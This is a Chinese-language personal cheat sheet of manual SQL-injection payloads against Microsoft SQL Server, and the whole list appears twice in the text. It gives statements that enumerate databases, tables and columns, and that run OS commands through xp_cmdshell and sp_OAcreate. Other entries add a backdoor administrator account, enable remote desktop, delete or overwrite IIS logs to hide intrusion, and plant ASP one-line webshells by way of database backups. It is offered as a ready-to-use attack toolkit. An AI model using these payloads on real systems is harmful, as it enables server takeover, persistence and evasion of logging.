自己整理了一些放到这里,以备不时之需。
[常规查询]
and exists (select * from sysobjects) //判断是否是MSSQL
and 1=convert(int,@@version) 或 1=(select @@version) //判断数据库版本
;declare @d int //是否支持多行
and (select count(1) from [sysobjects])>=0 //是否支持子查询
and user>0 //获取当前数据库用户名
and db_name>0 //获取当前数据库名称
and 1=convert(int,db_name()) 或 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner') //判断是否是库权限
and 1=(select is_srvrolemember('public') //判断是否为Public权限
having 1=1 -- //爆取当前数据库信息
group by 表名.列名 having 1=1 -- //爆取其他表名,由上句语句得来
group by 表名.列名1,表名.列名 having 1=1 -- //继续爆当前表中的其他列名
and (select top 1 name from(select top N id,name from sysobjects where
xtype='U[或char(85)]' and status>0) order by id desc)>1
//N从1开始递增即可爆当前库中所有表名,按ID降序排列
或 and (select top 1 name from sysobjects where xtype='U' and name not in
(select top N name from sysobjects where xtype='u'))>1 //同上
and (select top 1 name from master.dbo.sysdatabases order by dbid)>1
//跨库查询,爆第一个
and (select top 1 name from master.dbo.sysdatabases where name not in
(select top N name from master.dbo.sysdatabases order by dbid))>1
//跨库查询,N从1开始递增
and (select top 1 col_name(object_id('表名'),N)from sysobjects)>1
//爆指定表中任意列名,N从1开始递增
[扩展存储]
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND
name='xp_cmdshell') //判断xp_cmdshell是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where
name= 'xp_regread') //查看xp_regread扩展存储过程是已被删除
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll' //恢复xp_cmdshell
;exec sp_addextendedproc ‘xp_cmdshell’,'c:\xplog70.dll’ //自定义恢复路径
;exec sp_dropextendedproc 'xp_cmdshell' //删除xp_cmdshell
;exec master..xp_cmdshell 'dir c:\' //查看服务器C盘目录
添加和删除一个SA权限的数据库用户hakz:(需要SA权限)
exec master.dbo.sp_addlogin hakz,password
exec master.dbo.sp_addsrvrolemember hakz,sysadmin
停掉或激活某个服务:(需要SA权限)
;exec master..xp_servicecontrol 'stop','schedule' //规则服务
;exec master..xp_servicecontrol 'start','schedule'
;exec master..xp_servicecontrol 'start', 'server' //启动SERVER服务
获取WEB路径:
①利用xp_cmdshell搜索:
;exec master..xp_cmdshell 'dir /s d:/index.asp'
②利用IIS接口获得网站根目录:
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/2/root
③读取注册表:(Public 即可)
exec master.dbo.xp_regread
HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\sERVICES\W3SVC\Paramenters\VirtualRoots\’’/'
④利用OLE控件中的SP_OAMETHOD函数:
;declare @shell int
;exec master..SP_OAMETHOD 'wscript.shell',@shell out
;exec master..SP_OAMETHOD @shell,'run',null,'cmd.exe/c dir /s
d:/index.asp >c:/log.txt'
⑤利用xp_dirtree列目录:(Public 即可)
建立临时表:;CREATE TABLE temp([id] INT IDENTITY (1,1) NOT NULL,
[name][nvarchar](300) NOT NULL,[depth][int] NOT NULL,
[isfile][nvachar](50) NULL);
insert into temp exec master..xp_dirtree ‘d:/’,1,1
读取表中数据: and (select name from temp where id=N)>1 N从1开始递增
删除临时表: ;drop table temp;--
检测SP_OAcreate是否存在:
and 1=(SELECT count(*)FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
利用SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
hakz hakz /add'
设置虚拟目录E为可读:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs –a
w3svc/1/ROOT/e +browse'
利用xp_cmdshell添加用户:(需要SA权限)
;exec master.dbo.xp_cmdshell 'net user hakz hakz /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators hakz /add'
DOS下开3389 并修改端口号:
sc config termservice start= auto
net start termservice
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f //允许外部联接
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD //改端口到80
开启数据库的远程连接:
①;select * from OPENROWSET
('SQLOLEDB','server=servername;uid=sa;pwd=pass',’select * from table’)
②;select * from OPENROWSET
('SQLOLEDB', 'uid=sa;pwd=pass;Network=DBMSSOCN;Address=1.2.3.4,1433;',
'select * from table')
删除日志记录:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5
\ex100401.log >c:\temp.txt'
替换日志记录:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5
\ex090404.log c:\winnt\system32\logfiles\w3svc5\ex100401.log >c:\temp.txt'
差异备份语句:
①完整备份一次:
;backup database 库名 to disk=’c:\hakz.bak’;--
②创建表并插入数据:
;create table [dbo].[dtest]([cmd][p_w_picpath]);
;insert into dtest(cmd) values
(0x3C25657865637574652072657175657374282268616B7A2229253E);--
③差异备份:
;backup database 库名 to disk=’WEB路径\z.asp’ with DIFFERENTIAL,FORMAT;--
LOG备份语句:
;alter database null set RECOVERY FULL -- //激活数据库为还原模式
;create table cmd (a p_w_picpath)—-
;backup log null to disk=’c:\cmd’ with int --
;insrt into cmd(a) values
(0x3C25657865637574652072657175657374282268616B7A2229253E) --
;backup log null to disk=‘备份路径'
有时候可能一句话备份不能成功,可以多试试以下几个版本:
<%%25Execute(request(”hakz”))%%25>
<%Execute(request(”hakz”))%>
%><%execute request(”hakz”)%><%
<script language=VBscript runat=server>execute request("hakz")</script>
<%25Execute(request(”hakz”))%25>
如果备份的数据库名里面有特殊符号,要用[]包含起来.
沙盒模式提权:(需要SA权限)
当是SA权限但是xp_cmdshell被删除或xplog70.dll无法恢复时适用
①打开沙盒模式
;EXEC master.dbo.xp_regwrite
‘HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
②利用默认Access数据库
;Select * From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
shell("net user hakz hakz /add")');
MSSQL手工注入语句常用的大概就这么多了,有些比较偏僻的就没有收录了,不过以后要有用时我还是会及时地把它们添加进来的 ~O(∩_∩)O~
[常规查询]
and exists (select * from sysobjects) //判断是否是MSSQL
and 1=convert(int,@@version) 或 1=(select @@version) //判断数据库版本
;declare @d int //是否支持多行
and (select count(1) from [sysobjects])>=0 //是否支持子查询
and user>0 //获取当前数据库用户名
and db_name>0 //获取当前数据库名称
and 1=convert(int,db_name()) 或 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner') //判断是否是库权限
and 1=(select is_srvrolemember('public') //判断是否为Public权限
having 1=1 -- //爆取当前数据库信息
group by 表名.列名 having 1=1 -- //爆取其他表名,由上句语句得来
group by 表名.列名1,表名.列名 having 1=1 -- //继续爆当前表中的其他列名
and (select top 1 name from(select top N id,name from sysobjects where
xtype='U[或char(85)]' and status>0) order by id desc)>1
//N从1开始递增即可爆当前库中所有表名,按ID降序排列
或 and (select top 1 name from sysobjects where xtype='U' and name not in
(select top N name from sysobjects where xtype='u'))>1 //同上
and (select top 1 name from master.dbo.sysdatabases order by dbid)>1
//跨库查询,爆第一个
and (select top 1 name from master.dbo.sysdatabases where name not in
(select top N name from master.dbo.sysdatabases order by dbid))>1
//跨库查询,N从1开始递增
and (select top 1 col_name(object_id('表名'),N)from sysobjects)>1
//爆指定表中任意列名,N从1开始递增
[扩展存储]
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND
name='xp_cmdshell') //判断xp_cmdshell是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where
name= 'xp_regread') //查看xp_regread扩展存储过程是已被删除
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll' //恢复xp_cmdshell
;exec sp_addextendedproc ‘xp_cmdshell’,'c:\xplog70.dll’ //自定义恢复路径
;exec sp_dropextendedproc 'xp_cmdshell' //删除xp_cmdshell
;exec master..xp_cmdshell 'dir c:\' //查看服务器C盘目录
添加和删除一个SA权限的数据库用户hakz:(需要SA权限)
exec master.dbo.sp_addlogin hakz,password
exec master.dbo.sp_addsrvrolemember hakz,sysadmin
停掉或激活某个服务:(需要SA权限)
;exec master..xp_servicecontrol 'stop','schedule' //规则服务
;exec master..xp_servicecontrol 'start','schedule'
;exec master..xp_servicecontrol 'start', 'server' //启动SERVER服务
获取WEB路径:
①利用xp_cmdshell搜索:
;exec master..xp_cmdshell 'dir /s d:/index.asp'
②利用IIS接口获得网站根目录:
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/2/root
③读取注册表:(Public 即可)
exec master.dbo.xp_regread
HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\sERVICES\W3SVC\Paramenters\VirtualRoots\’’/'
④利用OLE控件中的SP_OAMETHOD函数:
;declare @shell int
;exec master..SP_OAMETHOD 'wscript.shell',@shell out
;exec master..SP_OAMETHOD @shell,'run',null,'cmd.exe/c dir /s
d:/index.asp >c:/log.txt'
⑤利用xp_dirtree列目录:(Public 即可)
建立临时表:;CREATE TABLE temp([id] INT IDENTITY (1,1) NOT NULL,
[name][nvarchar](300) NOT NULL,[depth][int] NOT NULL,
[isfile][nvachar](50) NULL);
insert into temp exec master..xp_dirtree ‘d:/’,1,1
读取表中数据: and (select name from temp where id=N)>1 N从1开始递增
删除临时表: ;drop table temp;--
检测SP_OAcreate是否存在:
and 1=(SELECT count(*)FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
利用SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
hakz hakz /add'
设置虚拟目录E为可读:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs –a
w3svc/1/ROOT/e +browse'
利用xp_cmdshell添加用户:(需要SA权限)
;exec master.dbo.xp_cmdshell 'net user hakz hakz /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators hakz /add'
DOS下开3389 并修改端口号:
sc config termservice start= auto
net start termservice
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f //允许外部联接
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD //改端口到80
开启数据库的远程连接:
①;select * from OPENROWSET
('SQLOLEDB','server=servername;uid=sa;pwd=pass',’select * from table’)
②;select * from OPENROWSET
('SQLOLEDB', 'uid=sa;pwd=pass;Network=DBMSSOCN;Address=1.2.3.4,1433;',
'select * from table')
删除日志记录:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5
\ex100401.log >c:\temp.txt'
替换日志记录:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5
\ex090404.log c:\winnt\system32\logfiles\w3svc5\ex100401.log >c:\temp.txt'
差异备份语句:
①完整备份一次:
;backup database 库名 to disk=’c:\hakz.bak’;--
②创建表并插入数据:
;create table [dbo].[dtest]([cmd][p_w_picpath]);
;insert into dtest(cmd) values
(0x3C25657865637574652072657175657374282268616B7A2229253E);--
③差异备份:
;backup database 库名 to disk=’WEB路径\z.asp’ with DIFFERENTIAL,FORMAT;--
LOG备份语句:
;alter database null set RECOVERY FULL -- //激活数据库为还原模式
;create table cmd (a p_w_picpath)—-
;backup log null to disk=’c:\cmd’ with int --
;insrt into cmd(a) values
(0x3C25657865637574652072657175657374282268616B7A2229253E) --
;backup log null to disk=‘备份路径'
有时候可能一句话备份不能成功,可以多试试以下几个版本:
<%%25Execute(request(”hakz”))%%25>
<%Execute(request(”hakz”))%>
%><%execute request(”hakz”)%><%
<script language=VBscript runat=server>execute request("hakz")</script>
<%25Execute(request(”hakz”))%25>
如果备份的数据库名里面有特殊符号,要用[]包含起来.
沙盒模式提权:(需要SA权限)
当是SA权限但是xp_cmdshell被删除或xplog70.dll无法恢复时适用
①打开沙盒模式
;EXEC master.dbo.xp_regwrite
‘HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
②利用默认Access数据库
;Select * From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
shell("net user hakz hakz /add")');
MSSQL手工注入语句常用的大概就这么多了,有些比较偏僻的就没有收录了,不过以后要有用时我还是会及时地把它们添加进来的 ~O(∩_∩)O~
